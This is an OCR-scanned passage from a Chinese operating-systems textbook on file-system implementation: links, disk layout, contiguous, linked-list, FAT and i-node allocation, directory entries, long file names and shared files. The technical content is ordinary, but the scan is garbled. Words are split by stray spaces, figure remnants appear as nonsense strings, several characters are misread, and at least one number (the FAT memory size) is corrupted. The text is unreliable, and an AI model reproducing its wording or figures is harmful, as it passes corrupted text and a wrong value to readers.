径 名 ， 并 建立 从 该 文件 到 路 径 所 指名 字 的 链接 。 这 样 ， 可 以 在 多 个 目录 中 出 现 同 一 个 文件 。 这 种 类 型 的 
链接 增加 了 该 文件 的 i 节点 (i-node) 计数 器 的 计数 (记录 含有 该 文件 的 目录 项 数目 ) ， 有 时 称 为 硬 链接 
(hard link ) 。 

8) unlink。 删 除 目 录 项 。 如 果 被 解除 连接 的 文件 只 出 现在 一 个 目录 中 (通常 情况 ) ， 则 将 它 从 文件 
系统 中 删除 。 如 果 它 出 现在 多 个 目录 中 ， 则 只 删除 指定 路 径 名 的 连接 ， 依 然 保 留 其 他 路 径 名 的 连接 。 在 
UNIX 中 ， 用 于 删除 文件 的 系统 调用 (前 面 已 有 论述 ) 实际 上 就 是 unlink。 

最 主要 的 系统 调用 已 在 上 面 列 出 ， 但 还 有 其 他 一 些 调用 ， 如 与 目录 相关 的 管理 保护 信息 的 系统 调用 。 

关于 链接 文件 的 一 种 不 同 想法 是 符号 链接 。 不 同 于 使 用 两 个 文件 名 指向 同一 个 内 部 数据 结构 来 代表 一 
个 文件 ， 在 符号 链接 中 ， 一 个 文件 名 指向 命名 另 一 个 文件 的 一 个 小 文件 。 当 使 用 这 个 小 文件 时 ， 例 如 打开 
文件 ， 文 件 系统 沿 着 路 径 最 终 找到 文件 名 ， 再 用 新 名 字 启 动 查找 文件 的 过 程 。 符 号 链接 的 优点 在 于 它 能 够 
跨越 磁盘 的 界限 ， 甚 至 可 以 命名 在 远程 计算 机 上 的 文件 ， 不 过 符号 链接 的 实现 并 不 如 硬 链 接 那 样 有 效率 。 
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43 文件 系统 的 实现 


现在 从 用 户 角度 转 到 实现 者 角度 来 考察 文件 系统 。 用 户 关 心 的 是 文件 是 怎样 命名 的 、 可 以 进行 哪些 
操作 、 目 录 树 是 什么 样 的 以 及 类 似 的 表面 问题 。 而 实现 者 感 兴趣 的 是 文件 和 目录 是 怎样 存储 的 、 磁 盘 空 
间 是 怎样 管理 的 以 及 怎样 使 系统 有 效 而 可 靠 地 工作 等 。 在 下 面 几 节 中 ， 我 们 会 考察 这 些 文件 系统 的 实现 
中 出 现 的 问题 ， 并 讨论 怎样 解决 这 些 问题 。 
4.3.1 文件 系统 布局 

文件 系统 存放 在 磁盘 上 。 多 数 磁盘 划分 为 一 个 或 多 个 分 区 ， 每 个 分 区 中 有 一 个 独立 的 文件 系统 。 磁 
盘 的 0 号 扇 区 称 为 主 引导 记录 (Master Boot Record，MBR ) ， 用 来 引导 计算 机 。 在 MBR 的 结尾 是 分 区 表 。 
该 表 给 出 了 每 个 分 区 的 起 始 和 结束 地 址 。 表 中 的 一 个 分 区 被 标记 为 活动 分 区 。 在 计算 机 被 引导 时 ， 
BIOS 读 入 并 执行 MBR。MBR 做 的 第 一 件 事 是 确定 活动 分 区 ， 读 入 它 的 第 一 个 块 ， 称 为 引导 块 (boot 
block) ， 并 执行 之 。 引 导 块 中 的 程序 将 装载 该 分 区 中 的 操作 系统 。 为 统一 起 见 ， 每 个 分 区 都 从 一 个 引导 
块 开 始 ， 即 使 它 不 含有 一 个 可 启动 的 操作 系统 。 不 过 ， 未 来 这 个 分 区 也 许 会 有 一 个 操作 系统 的 。 

除了 从 引导 块 开始 之 外 ， 磁 盘 分 区 的 布局 是 随 着 文件 系统 的 不 同 而 变化 的 。 文 件 系统 经 常 包含 有 如 
图 4-9 所 列 的 一 些 项 目 。 第 一 个 是 超级 块 (superblock)， 超 级 块 包含 文件 系统 的 所 有 关键 参数 ， 在 计算 
机 启动 时 ， 或 者 在 该 文件 系统 首次 使 用 时 ， 超 级 块 会 被 读 入 内 存 。 超 级 块 中 的 典型 信息 包括 : 确定 文件 
系统 类 型 用 的 魔 数 、 文 件 系 统 中 块 的 数量 以 及 其 他 重要 的 管理 信息 。 








整个 磁盘 





图 4-9 一 个 可 能 的 文件 系统 布局 


接着 是 文件 系统 中 空闲 块 的 信息 ， 例 如 ， 可 以 用 位 图 或 指针 列表 的 形式 给 出 。 后 面 也 许 跟随 的 是 一 
组 i 节点 ， 这 是 一 个 数据 结构 数组 ， 每 个 文件 一 个 ，i 节 点 说 明了 文件 的 方方面面 。 接 着 可 能 是 根 目录 ， 
它 存放 文件 系统 目录 树 的 根部 。 最 后 ， 磁 盘 的 其 他 部 分 存放 了 其 他 所 有 的 目录 和 文件 。 


4.3.2 文件 的 实现 

文件 存储 实现 的 关键 问题 是 记录 各 个 文件 分 别 用 到 哪些 磁盘 块 。 不 同 操作 系统 采用 不 同 的 方法 。 这 
一 节 ， 我 们 讨论 其 中 的 一 些 方法 。 

1. 连续 分 配 

最 简单 的 分 配方 案 是 把 每 个 文件 作为 一 连 串 连续 数据 块 存储 在 磁盘 上 。 所 以 ， 在 块 大 小 为 IKB 的 磁 
盘 上 ，50KB 的 文件 要 分 配 50 个 连续 的 块 。 对 于 块 大 小 为 2KB 的 磁盘 ， 将 分 配 25 个 连续 的 块 。 

在 图 4-10a 中 是 一 个 连续 分 配 的 例子 。 这 里 列 出 了 头 40 块 ， 从 左面 从 0 块 开 始 。 初 始 状态 下 ， 磁 盘 是 
空 的 。 接 着 ， 从 磁盘 开始 处 ( 块 0) 开始 写 入 长 度 为 4 块 的 文件 A。 紧 接着 ， 在 文件 A 的 结尾 开始 写 入 一 
个 3 块 的 文件 B。 

请 注意 ， 每 个 文件 都 从 一 个 新 的 块 开 始 ， 这 样 如 果 文 件 A 实 际 上 只 有 3'/, 块 ， 那 么 最 后 一 块 的 结尾 
会 浪费 一 些 空间 。 在 图 4-10 中 ， 一 共 列 出 了 7 个 文件 ， 每 一 个 都 从 前 面 文件 结尾 的 后 续 块 开始 。 加 阴影 
是 为 了 容易 表示 文件 分 隔 ， 在 存储 中 并 没有 实际 的 意义 。 
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连续 磁盘 空间 分 配方 案 有 两 大 优势 。 首 先 ， 实 现 简单 ， 记 录 每 个 文件 用 到 的 磁盘 块 简化 为 只 需 记 住 
两 个 数字 即 可 : 第 一 块 的 磁盘 地 址 和 文件 的 块 数 。 给 定 了 第 一 块 的 编号 ， 一 个 简单 的 加 法 就 可 以 找到 任 
何其 他 块 的 编号 。 

其 次 ， 读 操作 性 能 较 好 ， 因 为 在 单个 操作 中 就 可 以 从 磁盘 上 读 出 整个 文件 。 只 需要 一 次 寻找 (对 第 
一 个 块 )。 之 后 不 再 需要 寻 道 和 旋转 延迟 ， 所 以 ， 数 据 以 磁盘 全 带宽 的 速率 输入 。 可 见 连续 分 配 实现 简 
单 且 具有 高 的 性 能 。 











文件 A 文件 C 文件 E 文件 G 
(4 块 ) (6 块 ) (12 块 ) (3 块 ) 
|i | | Bee [| em meee 
EEF Grey eens Fy 
文件 B 文件 D 文件 F 
(3 块 ) (5 块 ) (6 块 ) 
a) 
(文件 A) (文件 C) (文件 E) (文件 G) 





图 4-10 a) 为 7 个 文件 连续 分 配 空间 ，b) 删除 文件 D 和 F 后 磁盘 的 状态 


但 是 ， 连 续 分 配方 案 也 同样 有 相当 明显 的 不 足 之 处 : 随 着 时 间 的 推移 ， 磁 盘 会 变 得 零碎 。 为 了 了 解 
这 是 如 何 发 生 的 ， 请 考察 图 4-10b。 这 里 有 两 个 文件 (DAF) 被 删除 了 。 当 删除 一 个 文件 时 ， 它 占用 的 
块 自然 就 释放 了 ， 在 磁盘 上 留 下 一 堆 空闲 块 。 磁 盘 不 会 在 这 个 位 置 挤 压 掉 这 个 空洞 ， 因 为 这 样 会 涉及 复 
制 空 洞 之 后 的 所 有 文件 ， 可 能 会 有 上 百 万 的 块 。 结 果 是 ， 磁 盘 上 最 终 既 包括 文件 也 有 空洞 ， 如 图 4-10 中 
所 描述 的 那样 。 

开始 时 ， 碎 片 并 不 是 问题 ， 因 为 每 个 新 的 文件 都 在 先前 文件 的 结尾 部 分 之 后 的 磁盘 空间 里 写 入 。 但 
是 ， 磁 盘 最 终 会 被 充满 ， 所 以 要 么 压缩 磁盘 ， 要 么 重新 使 用 空洞 所 在 的 空 闪 空间 。 前 者 由 于 代价 太 高 而 
不 可 行 ， 后 者 需要 维护 一 个 空洞 列表 ， 这 是 可 行 的 。 但 是 ， 当 创建 一 个 新 的 文件 时 ， 为 了 挑选 合适 大 小 
的 空洞 存 和 人 文件， 就 有 必要 知道 该 文件 的 最 终 大 小 。 

设想 这 样 一 种 设计 的 结果 : 为 了 录入 一 个 文档 ， 用 户 启动 了 文本 编辑 器 或 字 处 理 软件 。 程 序 首先 询 
问 最 终 文件 的 大 小 会 是 多 少 。 这 个 问题 必须 回答 ， 否 则 程序 就 不 能 继续 。 如 果 给 出 的 数字 最 后 被 证 明 小 
于 文件 的 实际 大 小 ， 该 程序 会 终止 ， 因 为 所 使 用 的 磁盘 空洞 已 经 满 了 ， 没 有 地 方 放置 文件 的 剩余 部 分 。 
如 果 用 户 为 了 避免 这 个 问题 而 给 出 不 实际 的 较 大 的 数字 作为 最 后 文件 的 大 小 ， 比 如 ，100MB ， 编 辑 器 可 
能 找 不 到 如 此 大 的 空洞 ， 从 而 宣布 无 法 创建 该 文件 。 当 然 ， 用 户 有 权 下 一 次 使 用 比如 50MB 的 数字 再 次 
启动 编辑 器 ， 如 此 进行 下 去 ， 直 到 找到 一 个 合适 的 空洞 为 止 。 不 过 ， 这 种 方式 看 来 不 会 使 用 户 高 兴 。 

然而 ， 存 在 着 一 种 情形 ， 使 得 连续 分 配方 案 是 可 行 的 ， 而 且 ， 实际 上 这 个 办 法 在 CD-ROM 上 被 广泛 
使 用 。 在 这 里 所 有 文件 的 大 小 都 事先 知道 ， 并 且 在 CD-ROM 文件 系统 的 后 续 使 用 中 ， 这 些 文件 的 大 小 
也 不 再 改变 。 

DVD 的 情况 有 些 复 杂 。 原 则 上 ， 一 个 90 分 钟 的 电影 可 以 编码 成 一 个 独立 的 、 大 约 4.5GB 的 文件 。 但 
是 文件 系统 所 使 用 的 UDF (Universal Disk Format) 格式 ， 使 用 了 一 个 30 位 的 数 来 代表 文件 长 度 ， 从 而 
把 文件 大 小 限制 在 1GB。 其 结果 是 ，DVD 电 影 一 般 存储 在 3 个 或 4 个 1GB 的 连续 文件 中 。 这 些 构成 一 个 逻 
辑 文件 (电影 ) 的 物理 文件 块 被 称 作 extents。 

正如 第 1 章 中 所 提 到 的 ， 在 计算 机 科学 中 ， 随 着 新 一 代 技 术 的 出 现 ， 历 史 往往 重复 着 自己 。 多 年 前 ， 
连续 分 配 由 于 其 简单 和 高 性 能 (没有 过 多 考虑 用 户 友好 性 ) 被 实际 用 在 磁盘 文件 系统 中 。 后 来 由 于 用 户 
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不 希望 在 文件 创建 时 必须 指定 最 终 文 件 的 大 小 ， 于 是 放弃 了 这 个 想法 。 但 是 ， 随 着 CD-ROM、DVD、 蓝 
光 光盘 以 及 其 他 一 次 性 写 光学 介质 的 出 现 ， 突 然 间 连续 分 配 又 成 为 一 个 好 主意 。 所 以 研究 那些 具有 清晰 和 
简洁 概念 的 老式 系统 和 思想 是 很 重要 的 ， 因 为 它们 有 可 能 以 一 种 令 人 吃惊 的 方式 在 未 来 系统 中 获得 应 用 。 
2. 链表 分 配 
存储 文件 的 第 二 种 方法 是 为 每 个 文件 构造 磁盘 块 链表 ， 如 图 4-11 所 示 。 每 个 块 的 第 一 个 字 作为 指向 
下 一 块 的 指针 ， 块 的 其 他 部 分 存放 数据 。 


XFA 
与 连续 分 配方 案 不 同 ， 这 一 方法 可 以 充分 
利用 每 个 磁盘 块 。 不 会 因为 磁盘 碎片 (除了 最 
后 一 块 中 的 内 部 碎片 ) 而 浪费 存储 空间 。 同 样 ， 
在 目录 项 中 ， 只 需要 存放 第 一 块 的 磁盘 地 址 ， e $ ? 
2 10 12 


文件 的 其 他 块 就 可 以 从 这 个 首 块 地 址 查找 到 。 y 4 7 
另 一 方面 ， 在 链表 分 配方 案 中 ， 尽 管 顺序 


文件 B 
读 文件 非常 方便 ， 但 是 随机 访问 却 相当 缓慢 。 
并 且 要 先 读 前 面 的 m-1 块 。 显然， 进行 如 此 多 的 
读 操作 太 慢 了 。 0 1 2 3 
物理 块 6 3 11 14 


o 


而 且 ， 由 于 指针 占 去 了 一 些 字 节 ， 每 个 磁 
盘 块 存储 数据 的 字 节 数 不 再 是 2 的 整数 次 寡 。 虽 图 4-11 以 磁盘 块 的 链表 形式 存储 文件 
然 这 个 问题 并 不 是 非常 严重 ， 但 是 怪异 的 大 小 确 
实 降低 了 系统 的 运行 效率 ， 因 为 许多 程序 都 是 以 长 度 为 2 的 整数 次 宕 来 读 写 磁盘 块 的 。 由 于 每 个 块 的 前 几 
个 字 节 被 指向 下 一 个 块 的 指针 所 占据 ， 所 以 要 读 出 完整 的 一 个 块 大 小 的 信息 ， 就 需要 从 两 个 磁盘 块 中 获 
得 和 拼接 信息 ， 这 就 因 复制 引发 了 额外 的 开销 。 sea 

3. 采用 内 存 中 的 表 进行 链表 分 配 

如 果 取 出 每 个 磁盘 块 的 指针 字 ， 把 它们 放 
“在 内 存 的 一 个 表 中 ， 就 可 以 解决 上 述 链表 的 两 2 
个 不 足 。 图 4-12 表 示 了 图 4-11 所 示例 子 的 内 存 中 3 
表 的 内 容 。 这 两 个 图 中 都 有 两 个 文件 ， 文 件 A 依 4 
次 使 用 了 磁盘 块 4、7、2、10 和 12， 文 件 B 依 次 
使 用 了 磁盘 块 6、3、11 和 14。 利 用 图 4-12 中 的 表 ， 
可 以 从 第 4 块 开始 ， 顺 着 链 走 到 最 后 ， 找 到 文件 
A 的 全 部 磁盘 块 。 同 样 ， 从 第 6 块 开 始 ， 顺 着 链 


9 
走 到 最 后 ， 也 能 够 找 出 文件 B 的 全 部 磁盘 块 。 这 10 
两 个 链 都 以 一 个 不 属于 有 效 磁 盘 编号 的 特殊 标 | 
记 (如 -1) 结束 。 内 存 中 的 这 样 一 个 表格 称 为 下 
文件 分 配 表 (File Allocation Table, FAT), | 


按 这 类 方式 组 织 ， 整 个 块 都 可 以 存放 数据 。 15| i J 
进而 ， 随 机 访问 也 容易 得 多 。 虽 然 仍 要 顺 着 链 
在 文件 中 查找 给 定 的 偏 移 量 ， 但 是 整个 链 都 存 图 4-12 在 内 存 中 使 用 文件 分 配 表 的 链表 分 配 
放 在 内 存 中 ， 所 以 不 需要 任何 磁盘 引用 。 与 前 
面 的 方法 相同 ， 不 管 文件 有 多 大 ， 在 目录 项 中 只 需 记 录 一 个 整数 (起 始 块 号 ) ， 按 照 它 就 可 以 找到 文件 
的 全 部 块 。 

这 种 方法 的 主要 缺点 是 必须 把 整个 表 都 存放 在 内 存 中 。 对 于 1TB 的 磁盘 和 1KB 大 小 的 块 ， 这 张 表 需 
要 有 10 亿 项 ， 每 一 项 对 应 于 这 10 亿 个 磁盘 块 中 的 一 个 块 。 每 项 至 少 3 个 字 节 ， 为 了 提高 查找 速度 ， 有 时 
需要 4 个 字 节 。 根 据 系统 对 空间 或 时 间 的 优化 方案 ， 这 张 表 要 占用 3GB 或 2.4GB 内 存 。 上 述 方法 并 不 实用 ， 
显而易见 ，FAT 的 管理 方式 不 能 较 好 地 扩展 并 应 用 于 大 型 磁盘 中 。 而 正 是 最 初 的 MS-DOS 文件 系统 比较 
实用 ， 并 仍 被 各 个 Windows 版 本 所 完全 支持 。 
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4. i 节点 


ae 


最 后 一 个 记录 各 个 文件 分 别 包含 哪些 磁盘 块 的 方法 是 给 每 个 文件 赋予 一 个 称 为 节点 (index-node) 
的 数据 结构 ， 其 中 列 出 了 文件 属性 和 文件 块 的 磁盘 地 址 。 图 4-13 中 是 一 个 简单 例子 的 描述 。 给 定 i 节 点 ， 
就 能 找到 文件 的 所 有 块 。 相 对 于 在 内 存 中 采用 表 的 方式 而 言 ， 这 种 机 制 具有 很 大 的 优势 ， 即 只 有 在 对 应 


文件 打开 时 ， 其 i 节 点 才 在 内 存 中 。 如 果 每 个 i 节 点 占 
有 n 个 字 节 ， 最 多 k 个 文件 同时 打开 ， 那么 为 了 打开 文 
件 而 保留 节点 的 数组 所 占据 的 全 部 内 存 仅 仅 是 kn 个 字 
节 ， 只 需要 提前 保留 这 么 多 空间 即 可 。 

这 个 数组 通常 比 上 一 节 中 叙述 的 文件 分 配 表 (FAT) 
所 占据 的 空间 要 小 。 其 原因 很 简单 ， 保 留 所 有 磁盘 块 
的 链表 的 表 大 小 正比 于 磁盘 自身 的 大 小 。 如 果 磁 盘 有 nn 
块 ， 该 表 需 要 n 个 表 项 。 由 于 磁盘 变 得 更 大 ， 该 表格 也 
随 之 线性 增加 。 相 反 ，i 节 点 机 制 需要 在 内 存 中 有 一 个 
数组 ， 其 大 小 正比 于 可 能 要 同时 打开 的 最 大 文件 个 数 。 
它 与 磁盘 是 100GB、4000GB 还 是 10000GB 无 关 。 

i 这 点 的 一 个 问题 是 ， 如 果 每 个 i 节点 只 能 存储 固 
















文件 属性 


磁盘 块 0 的 地 址 
磁盘 块 1 的 地 址 
磁盘 块 2 的 地 址 













定数 量 的 磁盘 地 址 ， 那 么 当 一 个 文件 所 含 的 磁盘 块 的 
数目 超出 了 i 节点 所 能 容纳 的 数目 怎么 办 ?一 个 解决 方 
案 是 最 后 一 个 “磁盘 地 址 ”不 指向 数据 块 ， 而 是 指向 
一 个 包含 额外 磁盘 块 地 址 的 块 的 地 址 ， 如 图 4-13 所 示 。 ha 
更 高 级 的 解决 方案 是 :可 以 有 两 个 或 更 多 个 包含 磁盘 图 4-13 i 节点 的 例子 

地 址 的 块 ， 或 者 指向 其 他 存放 地 址 的 磁盘 块 的 磁盘 块 。 在 第 10 章 讨论 UNIX 时 ， 我 们 还 将 涉及 i 节点 。 同 
样 ，Windows 的 NTFS 文 件 系统 采用 了 相似 的 方法 ， 所 不 同 的 仅仅 是 大 的 i 节 点 也 可 以 表示 小 的 文件 。 


4.3.3 目录 的 实现 

在 读 文件 前 ， 必 须 先 打开 文件 。 打 开 文 件 时 ， 操 作 系统 利用 用 户 给 出 的 路 径 名 找到 相应 目录 项 。 目 
录 项 中 提供 了 查找 文件 磁盘 块 所 需要 的 信息 。 因 系统 而 异 ， 这 些 信息 有 可 能 是 整个 文件 的 磁盘 地 址 (对 
于 连续 分 配方 案 )、 第 一 个 块 的 编号 (对 于 两 种 链表 分 配方 案 ) 或 者 是 i 节 点 号 。 无 论 怎 样 ， 目 录 系 统 的 
主要 功能 是 把 ASCII 文 件 名 映射 成 定位 文件 数据 所 需 的 信息 。 

与 此 密切 相关 的 问题 是 在 何 处 存放 文件 属性 。 每 个 文件 系统 维护 诸如 文件 所 有 者 以 及 创建 时 间 等 文 
件 属性 ， 它 们 必须 存储 在 某 个 地 方 。 一 种 显而易见 的 方法 是 把 文件 属性 直接 存放 在 目录 项 中 。 很 多 系统 
确实 是 这 样 实现 的 。 这 个 办 法 用 图 4-14a 说 明 。 在 这 个 简单 设计 中 ， 目 录 中 有 一 个 固定 大 小 的 目录 项 列 
表 ， 每 个 文件 对 应 一 项 ， 其 中 包含 一 个 (HEKE) 文件 名 、 一 个 文件 属性 的 结构 体 以 及 用 以 说 明 磁盘 
块 位 置 的 一 个 或 多 个 磁盘 地 址 (至 某 个 最 大 值 )。 





包含 附加 磁盘 
地 址 的 磁盘 块 





ma 
Bs 
玉 、 包含 属性 的 
a) b) 数据 结构 


图 4-14 a) 简单 目录 ， 包 含 固定 大 小 的 目录 项 ， 在 目录 项 中 有 磁盘 地 址 和 属性 ，b) 每 个 目录 项 只 引 
用 i 节点 的 目录 
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对 于 采用 i 节 点 的 系统 ， 还 存在 另 一 种 方法 ， 即 把 文件 属性 存放 在 i 节 点 中 而 不 是 目录 项 中 。 在 这 种 
情形 下 ， 目 录 项 会 更 短 : 只 有 文件 名 和 i 节点 号 。 这 种 方法 参见 图 4-14b。 后 面 会 看 到 ， 与 把 属性 存放 到 
目录 项 中 相 比 ， 这 种 方法 更 好 。 

到 目前 为 止 ， 我 们 已 经 假设 文件 具有 较 短 的 、 固 定 长 度 的 名 字 。 在 MS-DOS 中 ,文件 有 1~8 个 字符 
的 基本 名 和 1~3 字 符 的 可 选 扩展 名 。 在 UNIX V7 中 文件 名 有 1~14 个 字符 ， 包 括 任何 扩展 名 。 但 是 ， 几 平 
所 有 的 现代 操作 系统 都 支持 可 变 长 度 的 长 文件 名 。 那 么 它们 是 如 何 实现 的 呢 ? 

最 简单 的 方法 是 给 予 文件 名 一 个 长 度 限制 ， 典 型 值 为 255 个 字符 ， 然 后 使 用 图 4-14 中 的 一 种 设计 ， 
并 为 每 个 文件 名 保留 255 个 字符 空间 。 这 种 处 理 很 简单 ， 但 是 浪费 了 大 量 的 目录 空间 ， 因 为 只 有 很 少 的 
文件 会 有 如 此 长 的 名 字 。 从 效率 考虑 ， 我 们 希望 有 其 他 的 结构 。 

一 种 替代 方案 是 放弃 “所 有 目录 项 大 小 一 样 ”的 想法 。 这 种 方法 中 ， 每 个 目录 项 有 一 个 固定 部 分 ， 
这 个 固定 部 分 通常 以 目录 项 的 长 度 开始 ， 后 面 是 固定 格式 的 数据 ， 通 常 包括 所 有 者 、 创 建 时 间 、 保 护 信 
息 以 及 其 他 属性 。 这 个 固定 长 度 的 头 的 后 面 是 一 个 任意 长 度 的 实际 文件 名 ， 可 能 是 如 图 4-15a 中 的 正 序 
格式 放置 (如 SPARC 机 器 ) © 。 在 这 个 例子 中 ， 有 三 个 文件 ，project-budget、personnel 和 foo。 每 个 文 
件 名 以 一 个 特殊 字符 (通常 是 0) 结束 ， 在 图 4-15 中 用 带 叉 的 矩形 表示 。 为 了 使 每 个 目录 项 从 字 的 边界 
开始 ， 每 个 文件 名 被 填充 成 整数 个 字 ， 如 图 4-15 中 带 阴 影 的 矩形 所 示 。 


文件 1 项 长 度 指向 文件 1 的 文件 名 


文件 1 属性 


指向 文件 2 的 文件 名 











| 一 个 文件 的 项 


a) b) 
图 4-15 在 目录 中 处 理 长 文件 名 的 两 种 方法 : a) FEAT HA, b) 在 堆 中 


这 个 方法 的 缺点 是 ， 当 移 走 文件 后 ， 就 引入 了 一 个 长 度 可 变 的 空隙 ， 而 下 一 个 进来 的 文件 不 一 定 正 
好 适合 这 个 空隙 。 这 个 问题 与 我 们 已 经 看 到 的 连续 磁盘 文件 的 问题 是 一 样 的 ， 由 于 整个 目录 在 内 存 中 ， 
所 以 只 有 对 目录 进行 紧凑 操作 才 可 节省 空间 。 另 一 个 问题 是 ， 一 个 目录 项 可 能 会 分 布 在 多 个 页 面 上 ,在 
读 取 文 件 名 时 可 能 发 生 缺 页 中 断 。 

处 理 可 变 长 度 文件 名 字 的 另 一 种 方法 是 ， 使 目录 项 自身 都 有 固定 长 度 ， 而 将 文件 名 放置 在 目录 后 面 
的 堆 中 ， 如 图 4-15b 所 示 。 这 一 方法 的 优点 是 ， 当 一 个 文件 目录 项 被 移 走 后 ， 另 一 个 文件 的 目录 项 总 是 
可 以 适合 这 个 空隙 。 当 然 ， 必 须要 对 堆 进 行 管理 ， 而 在 处 理 文件 名 时 缺 页 中 断 仍 旧 会 发 生 。 另 一 个 小 优 


O 处 理 机 中 的 一 串 字 符 存 放 的 顺序 有 正 序 (big-endian) 和 逆序 (little-endian) 之 分 。 正 序 存放 就 是 高 字 节 存 
放 在 前 低 字 节 在 后 ， 而 逆序 存放 就 是 低 字 节 在 前 高 字 节 在 后 。 例 如 ， 十 六 进 制 数 为 A02B ， 正 序 存 放 就 是 
A02B ， 逆 序 存放 就 是 2BA0。 一 一 译 者 注 
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点 是 文件 名 不 再 需要 从 字 的 边界 开始 ， 这 样 ， 原 先 在 图 4-15a 中 需要 的 填充 字符 ， 在 图 4-15b 中 的 文件 名 
之 后 就 不 再 需要 了 。 

到 目前 为 止 ， 在 需要 查找 文件 名 时 ， 所 有 的 方案 都 是 线性 地 从 头 到 尾 对 目录 进行 搜索 。 对 于 非常 长 
的 目录 ， 线 性 查找 就 太 慢 了 。 加 快 查找 速度 的 一 个 方法 是 在 每 个 目录 中 使 用 散 列表 。 设 表 的 大 小 为 n。 
在 输入 文件 名 时 ， 文 件 名 被 散 列 到 1 和 n 一 1 之 间 的 一 个 值 ， 例 如 ， 它 被 x 除 ， 并 取 余 数 。 其 他 可 以 采用 的 
方法 有 ， 对 构成 文件 名 的 字 求 和 ， 其 结果 被 n 除 ， 或 某 些 类 似 的 方法 。 

添加 一 个 文件 时 ， 不 论 哪 种 方法 都 要 对 与 散 列 值 相 对 应 的 散 列表 表 项 进行 检查 。 如 果 该 表 项 没有 被 
使 用 ， 就 将 一 个 指向 文件 目录 项 的 指针 放 入 ,文件 目录 项 紧 连 在 散 列表 后 面 。 如 果 该 表 项 被 使 用 了 ， 就 
构造 一 个 链表 ， 该 链表 的 表 头 指针 存放 在 该 表 项 中 ， 并 链接 所 有 具有 相同 散 列 值 的 文件 目录 项 。 

查找 文件 按照 相同 的 过 程 进行 。 散 列 处 理 文件 名 ， 以 便 选 择 一 个 散 列 表 项 。 检 查 链 表 头 在 该 位 置 上 
的 链表 的 所 有 表 项 ， 查 看 要 找 的 文件 名 是 否 存在 。 如 果 名 字 不 在 该 链 上 ， 该 文件 就 不 在 这 个 目录 中 。 

使 用 散 列表 的 优点 是 查找 非常 迅速 。 其 缺点 是 需要 复杂 的 管理 。 只 有 在 预计 系统 中 的 目录 经 常会 有 
成 百 上 千 个 文件 时 ， 才 把 散 列 方案 真正 作为 备用 方案 考虑 。 

一 种 完全 不 同 的 加 快 大 型 目录 查找 速度 的 方法 是 ， 将 查找 结果 存 入 高 速 缓存 。 在 开始 查找 之 前 ， 先 
查看 文件 名 是 否 在 高 速 缓存 中 。 如 果 是 ， 该 文件 可 以 立即 定位 。 当 然 ， 只 有 在 查询 目标 集中 在 相对 小 范 
围 的 文件 集合 的 时 候 ， 高 速 缓存 的 方案 才 有 效果 。 

43.4 共享 文件 

当 几 个 用 户 同 在 一 个 项 目 里 工作 时 ， 他 们 常常 需要 共享 文件 。 其 结果 是 ， 如 果 一 个 共享 文件 同时 
出 现在 属于 不 同 用 户 的 不 同 目 录 下 ， 工 作 起 来 就 很 方便 。 图 4-16 再 次 给 出 图 4-7 所 示 的 文件 系统 ， 只 是 
C 的 一 个 文件 现在 也 出 现在 B 的 目录 下 。B 的 目录 与 该 共享 文 
件 的 联系 称 为 一 个 链接 (link)。 这 样 ， 文 件 系 统 本 身 是 一 个 
有 向 无 环 图 (Directed Acyclic Graph, DAG) 而 不 是 一 棵 树 。 
将 文件 系统 组 织 成 有 向 无 环 图 使 得 维护 复杂 化 ， 但 也 是 必须 
付出 的 代价 。 

共享 文件 是 方便 的 ， 但 也 带 来 一 些 问 题 。 如 果 目 录 中 包 
含 磁盘 地 址 ， 则 当 链 接 文件 时 ， 必 须 把 C 目 录 中 的 磁盘 地 址 
复制 到 B 目 录 中 。 如 果 B 或 C 随 后 又 往 该 文件 中 添加 内 容 ， 则 
新 的 数据 块 将 只 列 入 进行 添加 工作 的 用 户 的 目录 中 。 其 他 的 
用 户 对 此 改变 是 不 知道 的 。 所 以 违背 了 共享 的 目的 。 

有 两 种 方法 可 以 解决 这 一 问题 。 在 第 一 种 解决 方案 中 ， 
磁盘 块 不 列 入 目录 ， 而 是 列 入 一 个 与 文件 本 身 关联 的 小 型 数 
据 结构 中 。 目 录 将 指向 这 个 小 型 数据 结构 。 这 是 UNIX 系 统 中 图 4-16 有 共享 文件 的 文件 系统 
所 采用 的 方法 (小 型 数据 结构 即 是 i 节点 )。 

在 第 二 种 解决 方案 中 ， 通 过 让 系统 建立 一 个 类 型 为 LINK 的 新 文件 ， 并 把 该 文件 放 在 B 的 目录 下 ， 使 
得 B 与 C 的 一 个 文件 存在 链接 。 新 的 文件 中 只 包含 了 它 所 链接 的 文件 的 路 径 名 。 当 了 B 读 该 链接 文件 时 ， 操 
作 系 统 查看 到 要 读 的 文件 是 LINK 类 型 ， 则 找到 该 文件 所 链接 的 文件 的 名 字 ， 并 且 去 读 那个 文件 。 与 传 
统 (WE) 链接 相对 比 起 来 ， 这 一 方法 称 为 符号 链接 (symbolic linking) 。 

以 上 每 一 种 方法 都 有 其 缺点 。 第 一 种 方法 中 ， 当 B 链 接 到 共享 文件 时 ，i 节 点 记录 文件 的 所 有 者 是 C。 
建立 一 个 链接 并 不 改变 所 有 关系 ( 见 图 4-17)， 但 它 将 i 节点 的 链接 计数 加 1， 所 以 系统 知道 目前 有 和 多少 目 
录 项 指向 这 个 文件 。 

如 果 以 后 C 试 图 删除 这 个 文件 ， 系 统 将 面临 问题 。 如 果 系 统 删 除 文件 并 清除 节点，B 则 有 一 个 目录 
项 指向 一 个 无 效 的 节点。 如果 该 节点 以 后 分 配给 另 一 个 文件 ， 则 B 的 链接 指向 一 个 错误 的 文件 。 系 统 通 
过 i 节点 中 的 计数 可 知 该 文件 仍然 被 3 引用， 但 是 没有 办 法 找到 指向 该 文件 的 全 部 目录 项 以 删除 它们 。 指 
向 目录 的 指针 不 能 存储 在 i 节 点 中 ， 原 因 是 有 可 能 有 无 数 个 这 样 的 目录 。 

唯一 能 做 的 就 是 只 删除 C 的 目录 项 ， 但 是 将 节点 保留 下 来 ,并 将 计数 置 为 1!， 如 图 4-17c 所 示 。 而 现 
在 的 状况 是 ， 只 有 B 有 指向 该 文件 的 目录 项 ， 而 该 文件 的 所 有 者 是 C。 如 果 系 统 进行 记 账 或 有 配额 ， 那 么 
C 将 继续 为 该 文件 付 账 直到 B 决 定 删除 它 ， 如 果真 是 这 样 ， 只 有 到 计数 变 为 0 的 时 刻 ， 才 会 删除 该 文件 。 
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C 的 目录 B 的 目录 CHAR B 的 目录 


O O 
a) b) c) 


图 4-17 a) 链接 之 前 的 状况 ，b) 创建 链接 之 后 ，c) 当 所 有 者 删除 文件 后 


